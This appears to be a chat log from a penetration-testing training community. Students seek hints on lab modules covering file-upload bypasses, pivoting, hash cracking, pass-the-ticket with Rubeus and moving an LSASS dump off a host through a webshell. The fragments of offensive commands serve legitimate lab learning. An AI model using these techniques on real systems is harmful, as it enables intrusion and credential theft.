Remember, not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.

Ohhhh, the line "for ext in '.php' '.phps';" only does limited extensions. I'll try adding more and giving that another go in the morning.

yes, you need to play around more a bit.

Ok, thank you!

Cracking Wireless (WPA/WPA2) Handshakes with Hashcat
https://academy.hackthebox.com/module/20/section/226
Tells us to install hashcat-utils and use cap2hccapx.bin , but its giving me

hashcat-utils/bin/cap2hccapx.bin:Deprecated Notice. This tool is fully replaced with extraction tools from https://github.com/ZerBea/hcxtools 

and not returning a file. when running it on the provided .cap file.
Tested on both local and pwnbox.

Try hcxpcapngtool -o hashes.txt <file>.cap

Will do, thanks.

Start by getting ssrf to work, after this think how can you find other internal apps trough ssrf?

Need some hints on MSSQL, Sccm skill assessment question 1. I got the useremailsbut not the right pwd list

With the CDSA path, i'm more wondering is there a few fields i should get a lot more comfortable with or should it be more equal? like should i focus on Wireshark, Windows Event Logs, IDS/IPS or everything in general.

Did anyone do the "Model Deployment Tempering" exercise in AI Red Teamer Path?
I don't get what error is causing this result:

curl -X POST 'http://127.0.0.1:8081/workflows?url=http://127.0.0.1:8000/pwn.war'

{
  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}```

@stark egret here

forgot to change ubuntu to web but anyways, i want to transfer the lssas.dmp file from the windows internal host to attacker host

any ideas?

ubuntu is a webshell you said_

yeah

can you host a server on it? and then send a request from windows to pivot

or vice versa

describe the webshell?

lssas.dmp size?

i tried pinging the pivot and found that i can reach it, but idk what to do

i thought of a smb server to host it, but failed miserably

its a pw0ny web shell

for the size my VM crashed cuz i did something stupid with proxychains sooo its gone 💔 🥀

this seems like the right idea, try several ways of having a server host the lssas.dmp on windows and then curl it from pw0ny

if lssas.dmp is not too big u can b64 encode it

gotcha will try in a bit, thanks so much 🙏

Can I DM someone about the whitebox analysis skills assessment? I think I found the bug but I’m having issues with quotation marks

Footprinting module - MySQL section
Hi everyone, in this section there is this example with the Nmap enumeration to a MySQL server, but the text below says "This scan above is an excellent example of this, as we know for a fact that the target MySQL server does not use an empty password for the user root, but a fixed password". Is there an error?

Hello I have a little issue when I want to upload the .aspx Webshell in the "Laudanum, One Webshell to Rule Them All" Module. I have this error when I try to upload the file. Is it my mistake ?

Fixed

Nvm I did it

You should be able to come up with a custom password list.

can someone help me fixing this please? im struggling

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
        var=$(echo $var | base64)
        
        #<---- If condition here:
done

 Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

i dit this but its the wrong result:

#!/bin/bash 

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
    var=$(echo "$var" | base64)

    if echo "$var" | grep -q "$value"; then
        if [ ${#var} -gt 113450 ]; then
            echo "${var: -20}"
        fi
    fi
done

why is ssh pivot not working in Skills Assessment - Password Attacks?????

Can someone explain?

pls im really stuck

use chatgpt

Ok. Yes, thought so from the pdf but apparently not found the right combo

Already done, but i have not get the answer

do you know why?

it is --script=(script) the correct syntaxis i think

nono the syntax is correct, i have copied the command from the HTB section

does anyone else know something about?

Looks like you have a file that isn't supposed to be in the nmap scripts folder

I have search it on the folder but there isn't

i don't know how to solve

use find maybe to find that one deb file

no result

try from the / directory

seems like it is in my home directory, but why nmap sees that file?

probably because of the *, it's checking for file names in the current directory

can i delete this file?

if you did I'm pretty sure it'd still error but try it

but why nmap see this file if it searches script frm the scripts directory?

because of the *

bash is evaluating it before nmap does

yes but i thought the * starts from the scripts directory, not from the root

no it's for cwd

can any body help me with logrotate privilege escalation

im not able to get the reverse shell

sometimes just gotta try it like 20 times, it's weird, run pspy at the same time to check if it's triggering

hey, can anyone help me with this : chmod 600 id_rsa
❯ ssh -i id_rsa tom@10.129.202.20
tom@10.129.202.20: Permission denied (publickey). is for the hard lab footprinting.

Hi I just started taking the cjca exam & I am having some connectivity issues. Can I possibly PM someone for assistance?

Reach out to Support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

i have tried with different combinations but the output is the same everytime

done!!

Hello guys,

I am running socks_proxy from MSF, and after ~ 5-10min the connection becomes timeout, even I can confirm the Pivot host itself still functional and working

is htb ever goanna make a wi-fi hacking skill path or even better a certificate?

Nothing has been confirmed yet, but the number of modules suggests this is the case.

I got it all figured out. Thank you!

Any other Pro Labs outside of P.O.O., Dante, and Offshore for CPTS Prep?

The cpts path is more than
Enough to prepare yourself

I'm so nervous is all.

I got the subscription to do the three labs before I start the exam.

Zephyr is a fun one

Hi, I'm doing the module on nmap and I have to find the flag in the services. I tried all the types of scans listed but it doesn't work. Now I'm trying with the manual scan with tcpdump and netcat but I don't get any banners.

what could be the problem?

It so frustrating that when you start an instance for VM doesn’t connect and you lose it if you refresh the page

Free is not the way to go

Hola Migos

Hi and welcome. Please make sure to read the #rules and follow the instructions in #welcome to gain access to more channels.

guys

i bought the platinum subscription and got only 700 cube shouldnt i get 1000 cube as it says ???!

Reach out to support on the website if you feel there's been a mistake

i did but didnt get a response yet

It's the weekend, wait for next week

Support is not provided over Discord

but the platinum subscription gives a 1000 cube right ?

Looks like it yes

hey just an ask but with interactive sections, i know im meant to reapply the commands im learning and play around with them myself.

But would it be effect to also note them down or would it just be hindering?

The commands? I'd definitely recommend adding those to your notes

for versions you should just run -sV? or have you ran that?

Uh hello, how do I claim the certificate for Holmes 2025 CTF?

tysm

I seem to be stuck on a pretty easy question asking "How many layers are typically included in device protection? (Format: <number>)" I'm pretty sure the answer is <4> but that doesn't seem to be working #modules

turns out just 4 was fine. not sure why it suggested that format and <> was required

Which section?

hi

it was the question at the end of the "Mobile Security" page in the "Introduction to Information Security" module. But I figured it out thank you. Just the number by itself worked

Follow the instructions in #welcome to link your htb account

I'm going through the "Cracking Passwords with Hashcat" module and there is an optional exercise involving an NTDS dump and a responder log. I was able to get a few passwords for the NT hashes but I have no heckin' clue what this thing is asking me for and I don't know anything about NTLM yet as I haven't done any AD modules like that yet. Did I miss something in the hashcat module or is this something I should come back to after learning more about NTLM2? It's at the bottom of https://academy.hackthebox.com/module/20/section/113

Recently, however, you read about another method to obtain something usable when you have an NTLMv2 password hash.
🤷

After a bunch of searches and confused questions aimed at LLMs, I think I understand now what is going on and how the pieces fit together for that puzzle.

did anyone use DBeaver to connect to Oracle DB? I am on GUI of DBeaver, where can i find the password hash of DBSNMP?

i found the DBSNMP user, but could not find password hash

Did anyone solve RDP and Socks tunneling with socksoverrdp in pivoting module with ligolo? This section is a double pivot, anyone.?

Hi.. is there any required format for submitting the SID(security identifier) for the windows module. I have been trying this for the past 1 hour and it's always wrong:
S-1-5-21-2614195641-1726409526-3792725429-1003

Then that is not the right SID. Always best to say which module, section, and question you're on.

@cloud urchin I solve it by manually typing the sid string. copy and pasting seems not accepted

• 3 Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

guys i have problem with this question i need help [ room bash script ]

you can dm me

Is there a way to reset my progress in an academy path or module?

عشوائي أخذتها من نص، لتكوّن كتيّب بمثابة دليل أو مرجع شكلي لهذه الأحرف. خمسة قرون م

Did anyone do the "Model Deployment Tempering" exercise in AI Red Teamer Path? I'm really out of ideas for extracting the flag

hi

anyone here

thats sad, but thanks

Hello guys semoene sent me a link can semeone check it

hi guys

Yes

Bonjour

Je viens d'integrer hack the box
Et j'aimerai que quelqu'un me guide pour les premieres etapes
Et merci

English only, please

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

This blog post shows you how to get started.

Hello,
I just joined Hack the Box.
And I'd like someone to guide me through the first steps.
Thank you.

Check out the blog post I posted above.

Okay thank u

hey guys I'm literally stuck at Burp intruder Using web proxies

I tried the intruder using burp but only get 301's and no flag

can anyone help?

i got a question about mssql and sccm skill. I can use nxc with mssql but not impacket-mssql or powerup.. i think the way to escalate but cant get it to work over nxc

You should be able to access using mssqlclient.py

ok. i get logon failure as soon as i use impacket but works with nxc. i think my syntax is right. i have used domain/name:pwd@ip and without

Try adding a type of authentication to your command.

hahhahaha, thanks

i thought i have read the help so many times. but apparently not enough 🙂

I need help!!!

ok

Now we all have it

Have what?

Eh?

Do not post images, text, screenshots, etc., of flags, creds, or anything considered a spoiler.

Oh

If that is the correct flag, check for leading or trailing space and maybe a page refresh is necessary to resubmit.

is there any way to earn cubes or voucher without giveaway, like keeping streak or solving ctf, for individual? givewaway has huge randomness and also public competitions as well.

Placing in a season

I need cubes to learn but at the point of life, I can't spend that much from this circumstance.

like top 3 or champion only?

I've already seen it. Thanks ❤️

guys ive been trying to solve the Virtual Hosts for more than 3h idk what working with it i mean i've tryd to change thing and it just wont work

Thanks, u r genius, maaan!

In the intro to windows evasion module I'm stuck at opensource section can anyone help me there been stuck for s long time there

Greetings all, I just finished File Upload Attacks > Whitelist Filters. After fuzzing extensions, to make sure the PHP code actually renders on page, I manually browsed to every single file I uploaded with the appropriate response length 😬

That seems very inefficient. Is there a way to dump those URLs to a file and check if the code renders on the page? I don’t think cURL would do the trick?

So in this case we already knew PHP was being used on the site. But we had to go through and validate which extension allowed to PHP Hello World code to actually run.

yo guys

one problem.. many questions

im on SQLmap essentials

on the 6th section 'Attack Tuning'

well

my question is answered while im typing so

thanks for anyone who was a part of it

Right. I used Burp Intruder to fuzz. Now that I think about it, I should have just went to the Render tab in the responses huh…🤣

Actually, that doesn't show the PHP code rendered either. It just says, "File successfully uploaded". I have to actually browse to the page to see the PHP Hello World on the page.

Right. But this doesn't this doesn't show if the code actually runs does it?

Ok, thank you for the responses!

https://academy.hackthebox.com/module/51/section/477#questionsDiv

I found flag but for some reason it doens't accept it

i url decoded it also

then it's the wrong flag. maybe manually type make sure no whitespaces if you think you have it.

Is there any way to make Nmap run a service scan faster?

https://nmap.org/book/man-performance.html

the flag should be ch..s!

--min-rate should do it I usually run it at 2000 it basically sends 2000 probe packets per second

Is there a ranking somewhere à la duolingo for the weakly streaks ? Or is it just a personal metric ?

This isn't a duolingo server

so no ranking then

(on the streaks)

no

just curious guys if any of u wana help me with AD module?

i am trying to take the points so i can purchase another path

Always best to just ask your question. Make sure to include the module, section, and question you're on. Relevant details like what you've tried helps too. Just don't spoil any content above tier 0.

in other words i just want the points if that's possible? , i do not know AD tho and this is pivoting

it would require a lot of work i dnt understand , i just need the points so i can purchase the path i wanted but yea

No one's going to just give you the answer.

Like I said, best to say which module, section, and question you're on. You haven't said that so no one can help.

There are a number of modules that use AD.

just a few questions , like why not? i am going to buy cubes later on but i wana collect the left over points

u dont want a hackthebox customer? i am going to spend later but i jsut need to take the left over points

i am like 80% done but the remaining one requires heavy pivoting , i dnt know honestly

are you planning on taking CPTS or any exam?

You're asking for help and refusing to say what you want help on. For the 3rd time, when asking for help make sure to include the module, section, and question you're on. No one can help you if they don't know what you're working on.

i have a few but lets start with this

https://academy.hackthebox.com/module/158/section/1434

the last question

i am planning to buy cubes , no exam

gona spend it on the bug hunter path

but i figure i got 1 AD module which has cubes to take

however these questions aint easy lol , like i dnt know AD tho honestly.

Do your best then they can not out-right give you the answers, but they can help.

well that violated TOS

the question your stuck on has nothing to do with ad

i solved other questions , i figure i dnt need the cubes anymore

i only left with 4 cubes remaining , wont make a big diff , so i moving on to buy cubes to unlock my desired path

i mean it's part of the CPTS path if you're planning on doing that one

¯_(ツ)_/¯

but whatever boats your float

u need to open tunnel or smtg to access it , the repo i downloaded produce error on the python code
i can't deal with erros now tho but oh well 4 cubes only , no big diff i got 80% of them already

i am doing the bug hunter path

the reading explicitly tells you how to do it

¯_(ツ)_/¯

yea why still error in the repo i downloaded , no time for it atm , too hassle , it should be simple but gives me an error on the code while i try to run the server

that's just 1 simple question anyways
the rest of it requires pivoting and getting the flag on the compromised machine

i have no idea honestly but yea

i mean you can solve it using any other pivoting technique if you don't wanna use rpivot

you're not forced to use the tool in the section

i dk pivoting tho , what other tools? let me try

chisel? lingolo?

chisel, ligolo, even just the remote/reverse pf technique from earlier in the module

even sshuttle

the fact you're saying "i don't know pivoting" means you didn't take notes going through the module and were just hoping to skate by on 3rd party guides that break ToS so that you didn't have to put in the legwork to actually learn WHY what you're doing may not be working

honestly man u should know by now i dnt have knowledge in AD or pivot
is just a left over module i got i dk when i got this but i figure i ma take the cubes so i dnt need to spend so much

i am working on bug hunter path now , but 4 cubes not much big diff , i asssume the bug hutner path gives cubes like 10-20 for each completed room or smtg

i can always come back to learn fully , but now i am fighting against the time
is better to work smart sometimes why waste time when i can use my brain
but 4 cubes , oh well

it was just 1 module of AD i dint buy the entire thing , i would study if i wana buy the entire thing lol

i think i got it back then was cause i wanted to see academy's pivotting when i was looking into the OSCP
so i only got like 1-2 AD related moduels from academy i dint get the entire CPST path course

respectully lol that wasn't what i was saying at all

why? 😭 2 days im here...

Why can't I find the file on Arturo's desktop RDP IPv4?

the module is Windows Laterlal Movements: Skills Assessment: Q2

For a start it looks like you have a space between the password and the closing quote mark

Also maybe you need to specify the AD domain?

Thank you, but I don't think so. I believe the password and domain are correct.

You can DM

Anyone did the new wpa3 attacks module ? Stuck in the final q of sa. What is the password of the Wi-Fi network "Orionexa-IOT"?

Nvm, anyone stuck here just have a little more patience and you will get it

Hi! Which modules have you liked the most? I have a month left until my silver subscription expires and I'd like to do a few good modules

hey guys im stuck at the Virtual Hosts thing for more than one day like when i visit the domain its down when i put it the etc/hosts and still the domain still not working like i know the flag but still the web site down and i wont submit
it

Hi,

I am stuck at Information Gathering - Skills Assessment (last 2 questions).

Can anyone help me out?

EDIT: nvm I got it

hey guys im stuck at the Virtual Hosts thing for more than one day like when i visit the domain its down when i put it the etc/hosts and still the domain still not working like i know the flag but still the web site down and i wont submit
it

Hi.. am having connectivity issues using reminna on my machine kali2025.3. I can confirm that openvpn is working ifconfig and using ip route get lab_machine_ip_address goes throught the tunnel. Also i ping my tun ip_address and all were success. Currently working on windows module. Any help would be appreciated

Could someone please give me a clue about the skills assessment for the 'LLM Output Attacks' module? I've already found the admin key and accessed the Adminbot, but then I don't know what else to do to get the flag.

Try to understand the features the adminbot supports

Could you please confirm if the calculate_shipment_time function is the correct way to go? It's the only function that accepts user input.

🤷‍♂️

if it's the only one, analyze it

I can't get this function to generate any kind of indication of a possible SQLi. Is that the correct path?

Recall what you've learned throughout the module

Remember it's a SA on lateral movement.

PASSWORD ATTACKS
Skills Assessment - Password Attacks

i have access to the external host DMZ01 , the next step is to get access to the internal DMZ01 (i think) , but i dont know how to , i tried searching for low hanging fruits , ANY HINTS ?

hey guys im stuck at the Virtual Hosts thing for more than one day like when i visit the domain its down when i put it the etc/hosts and still the domain still not working like i know the flag but still the web site down and i wont submit
it

Read over Pivoting Primer in the scenario (last paragraph).

What module/section is this from?

ya they saying me to use the pivoting tools , i used the chisel and can communicate with the internal network , this is the part where im stuck at

i dont know what to do next

Ah ok, well you have a foothold, so do some host enumeration. Was there a section that covered credential hunting in Linux?

Information Gathering - Web Edition / Virtual Hosts
im using the vm they gave me not my own kali machine

Ok, you can DM so I can look at what you have configured.

ya , thats what i was needing , thx for the hint

Hello. I had a question about the student account in HTB. How do I add a student account and how long does it take to be approved? I added a student account, but to make it the first one, I need to change it, and when I try to change it, it says that you can't change it until October 10th, what is the reason for this?

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

Can I dm someone for File Upload Whitelist Filters

ask here what's your question

Got it thanks

Hi everyone, I'm stuck at Pass the Ticket from Windows, i'm trying to do the "Optional Exercise" and doing PtT using PowerShell Remoting only with Rubeus.exe but I always fall into "KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED" I put the key decoded in hex format. What I am doing wrong? Thanks

try mimikatz if you are getting with mimikatz

With mimikatz all good, i was trying all the process with rubeus only as the optional exercise tells

which command you are executing

1. Rubeus.exe dump /nowrap
2. Convert base64 key in HEX format
3. Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
4. Rubeus.exe asktgt /user:john /domain:INLANEFREIGHT.HTB /aes256:<hex> /ptt
   Here I have the issue "KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED"

The HEX converted key it's the same I can dump from Mimikatz using "mimikatz.exe sekurlsa::tickets /export" Session Key aes256_hmac

The point 4. was runned in the new cmd.exe session

hello if i want to get the academy with studiant email how can i do it¿?

Sorry maybe this a dumbass question but I have answered all the questions...but button mark complete & next is missing even and because of that I cannot finish the module...

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

ummm it should work i guess...no idea sorry

maybe u can try rubeus kerberoast instead of asktgt

hi Everyone, i'm stuck on Injection Attacks skill Assessment, actualy i've ssrf, but i tried with xpath/sqli and still stucked, anybody has pwned the lab?

don't worry, later i try this! thanks

Hello, i am working on 'Credential Hunting in Network Shares' https://academy.hackthebox.com/module/147/section/1334, i have ran snaffler, but it returns alot of info. i have also tried using the -u paramenter for a user i found from the user folders on the target. Also ran netexec with no luck as well, i couldn't get powershuntshares to run really.

anyone had any luck with this module

he anyone finished the intro to windows evasion module free to help im stuck at the open source part of the module

nevermind i got it

Heey guys, I am stuck on a Introduction to Active Directory / Active Directory Groups / Q1. What group type is best utilized for assigning permissions and right to users?

Can somebody help me with this ?

I think the answer is "Security groups" but its not.

|| ┌──(root㉿kali)-[/opt/subbrute] └─# ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt /opt/subbrute/./subbrute.py:462: SyntaxWarning: invalid escape sequence '\.' permute_filter = re.compile("^[a-zA-Z0-9]{" + str(self.permute_len) + "}\.") /opt/subbrute/dnslib/lex.py:141: SyntaxWarning: invalid escape sequence '\.' """ Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt. Warning: No nameservers found, trying fallback list. Process lookup-3: Traceback (most recent call last): File "/root/.pyenv/versions/3.12.7/lib/python3.12/multiprocessing/process.py", line 314, in _bootstrap self.run() File "/opt/subbrute/./subbrute.py", line 422, in run response = self.check(hostname, query_type, timeout_retries) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/opt/subbrute/./subbrute.py", line 342, in check resp = self.resolver.query(host) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/opt/subbrute/./subbrute.py", line 57, in query name_server = self.get_ns() ^^^^^^^^^^^^^ File "/opt/subbrute/./subbrute.py", line 107, in get_ns ret = self.nameservers[self.pos] ~~~~~~~~~~~~~~~~^^^^^^^^^^ IndexError: list index out of range ||

This is sooo broken lol

I have no idea how I'm supposed to fix this lol

Hey everyone! I’m new to the cyber path — started today. You all seem super experienced — any tips for a beginner? I’m planning to take the CEH (EC-Council) in 3 months, so any guidance, study resources, or lab recommendations would be amazing. Thanks in advance!

Are you stuck on getting it to work on the TARGET host?

hello can someone help me. I am having a hard time to RDP.
I tried xfreerdp /v:IP ADDRESS /u:USERNAME /p:PASSWORD but it prompts bash !@# Event not found
I'm working on the Windows Event Logs

Yup

You can DM what you are trying.

Hello, im trying to figure out the SQLi fundamentals skill assessment. I dont quite understand why if i have the FILE privileges and SECURE_FILE_PRIVILEGE with no restrictions, yet i cant just write the webshell in /var/www/html

Hello guys, I'm a complete beginner hacking, I know how to code with Java, Php, JavaScript , SQL... What should I start learning and how?

I would double check the path where you can potentially write to.

And why I can't acces the general chat?

@short hare I have the same problem. Did you find the correct format? Anyone on this?

Please do not send me friend requests.

okk got it

As I said, stop sending me friend requests.

Venture over to #welcome and follow the steps to verify your account, as this will provide you access to more channels that might be more related to what you are looking for, i.e., #careers-and-certs and #general and it is also worth reading through the #rules of any server you join.

👍

ok

Because you have writing perms, then you will write the web shell, can then you can access that...main thing is to putting the web shell on the server, which we are doing through sql in this case

There is another path where you can write

They want you search that in which folder you have privs for writing

hi, everyone , i have a question from https://academy.hackthebox.com/module/144/section/1311 , third question

im stuck nearly 2 days (

i did

which one i need choose? ffuf or gobuster?

using fuzzing

on firefox

hmm okayy

thx, i just got it

Welcome

Could someone please give me a clue about the skills assessment for the 'LLM Output Attacks' module? I've already found the admin key and accessed the Adminbot, but then I don't know what else to do to get the flag.

is it my box that is buggy but i can load any in memory or upload anything to sccm skill assesment db02

hello, i am doing Command Injections module and i am stuck on Advanced Command Obfuscation can anyone help please?

Currently working through: File Upload Attacks > Type Filters > "Exercise: Try to run the above scan to find what Content-Types are allowed."
https://academy.hackthebox.com/module/136/section/1290

I figured this would be super simple. I created the wordlist for only image types using the commands in the section. Fired off Intruder with Content-Type as the position. All the responses were either 226 or 227 length and had the message "Only images are allowed". Changing the filename to shell.php (as shown in the section screenshot) results in "Extension not allowed". Not a huge deal but I figured I would get the same results shown in the section.

Hello guys
In "AD Enumeration & Attacks - Skills Assessment Part II"
Why do we have to run the "Inveigh" again if we have already run the Responder and found one user? AFAIK, if we are within the same network, we can listen to all LLMNR requests.

Please correct me if I am wrong

@tepid horizon Please take care not to spoil content from modules above tier 0

Oh... sorry... I didn't know the rule here... Should I delete the question? if so, where can I discuss??

I already deleted it. You can ask here, just take care to not post details. Anyone who has done it doesn't need the extra details. If you feel like you need to reveal more you can take it to DM's.

I am stuck on DACL Attacks II: Q1. Can anyone discuss how to proceed?

I am asking because I was warned that I must not reveal the detail of course here. so I am looking for someone who can discuss on DM

DM me

On DACL Attacks II Skills Assessment Q2, I have the ||GPO created and linked|| but when I run ||gpupdate /force|| nothing happens?

"Configure SELinux to prevent a user from accessing a specific file."
Anyone can help me in this question. from Linux fundamentals - Network Configuration

I'm pretty stuck again:
File Upload Attacks > Type Filters > "The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt""
https://academy.hackthebox.com/module/136/section/1290

I'm just starting by fuzzing a file extension that isn't blocked. All the extensions I've tried are blocked. Next I tried adding the Magic Byte and fuzzed with that as well - all extensions still blocked.

I can assure you that there's a file type allowed.

Oh, I'm sure there is! I just haven't been able to find it.

Been through it twice now

Start simple, find something that actually uploads. Like a real picture. From there use Burp to iterate through the extensions til you find one that works.

That's the problem. I got an actual picture to upload. EZ. After that I go to the extension script we've used up to this point. I've tried so many different iterations of the fuzzing script and not once am I getting an upload through. I guess I could add every single extension from PayloadsAllTheThings extensions.lst but that would be an enormous number of requests.

I used the list they taught in the module

That's the first list I tried. I'll run through it again though.

make sure to use the techniques in the file extension section too

So that list only has two extensions total when unedited - .php and .phps

Try what's provided in the Whitelist Filters section

Is that different that what you meant by the list in the module?

https://academy.hackthebox.com/module/18/section/2098

Hello Anyone please I have been stuck all day !!!

i believe it's the same list but with some additional techniques

just take it 1 step at a time. the first goal is finding a file extension that uploads.

then move on to the next filter, etc

That's the step I've been stuck on for a few days now. I just can't get an extension to upload. I've tried 3 variations on that fuzzing script to no avail.

k so you have your actual picture file type that uploads. did you go through the whitelist filter techniques?

That's the section we start using the bash script for testing file extensions. Tried that but not the OG script with only the two extensions. I'll try that again I guess. I have to redeploy my victim box though. That's how long I've been working on it today 🤣

no, that script is only one part of that section. there are other techniques.

the script is for character injection

Looking at it again

Ok, I just tried what I think you were leading me to but all 22 extensions failed 🤣

Tried using the PayloadsAllTheThings extension list as well as the SecLists one.

Use the very first technique shown in that section

Hello Everyone !
I need help with this one please, I know the answer because I know stuff from pentest experience. However I want to know how am I supposed to do this without guessing !!!

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

In the Blacklist or Whitelist filters section? And of course my attackbox died again. Starting from scratch 🤣

Tried the first thing in Blacklist filters - no luck. All it has us to is alter the name of the file and insert our shell code. Immediately after that we go to trying the wordlists. First for extension fuzzing, then character injection.

In the AEN module I have the NTLMv2 password hash for the mpalledorous user, however I've tried multiple wordlists (rockyou.txt, password.txt from earlier) and am not getting it

You can DM me if you're still stuck

I'm hanging it up for the night. I'll read through the material again tomorrow morning and PM you if I'm still having issues if that's ok?

ok

Anyone can help with Advanced command obfuscation?

sure what module you doing?

Finding the output of find /usr/share/ |grep root | grep mysql | tail -n 1

Currently doing MSSQL, Exchange, and SCCM Attacks, in the Exchange section for Enumeration, the third question is ||Find valid credentials and submit the email|| not really sure what it means by this if someone has a nudge, probably straightforward

You have gathered potential email addresses, try to find a way to obtain access to one of them

already attempted spraying but will do again

Hello, on the Attacking Web Applications with Ffuf module- the Skills Assessment . I am stuck on third question saying "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". any guidance would be much appreciated.

Added some passwords to the list and still nothing

Hey everyone, newbie here with his first ask for help lol. I'm on the knowledge check in the getting started module. I finally cracked the admin password after like an hour of trying to get hashcat to work, utterly defeated to find not a trace of the user.txt flag... where on earth am I supposed to be looking???

stuck on the same thing did you do it?

nvm lol I got it

if this will be the text on the page then maybe the response code will be 403 for it

Hey! im doing the Pivoting, Tunneling, and portforwarding skill assessment but the pivot host just isn't stable, im trying to use ligolo-ng, and I got it to work with xfreerdp, but my agent keeps getting dropped, is there a way to stabilize the connection so it doesn't constantly get dropped?

Your best bet is to swap over to the TCP vpn, although that can cause issues if you start another TCP tunnel within it, but aside from that, that should be more stable, if not quite a bit slower.

ill give this a try, thank you!

Still stuck on this if anyone has more advice

can someone point me toward the Theranos device

Password attack , skill assessment
I'm in the DMZ01 (external) trying to get any ticket and stuff so I can enter the internal network , do I need to do privilege escalation of DMZ01 to get crediantials of internal network first?

Or I can get it with the local user itself (which I tried but can find anything)

Worked without issues, Thanks again!

The Password Attacks module, I am still stuck on the Pass the Certificate, the second question. The Printerbug.py is showing an error. Any help? And yes, I have tried running it as root on both occasions.

tickets aren't required from what i remember, at least to move internal

Then how do I access the internal hosts?

maybe there's something in the first user's history :)

Oh 😱.. thx

always start simple

Can anyone help me with ODAT installation? The script on the HTB academy section doesn't work

run the install script line by line instead of as a script

also parrot has ODAT in their repo

Already done, i have troblue with this line: pip install python-libnmap

read the 'error'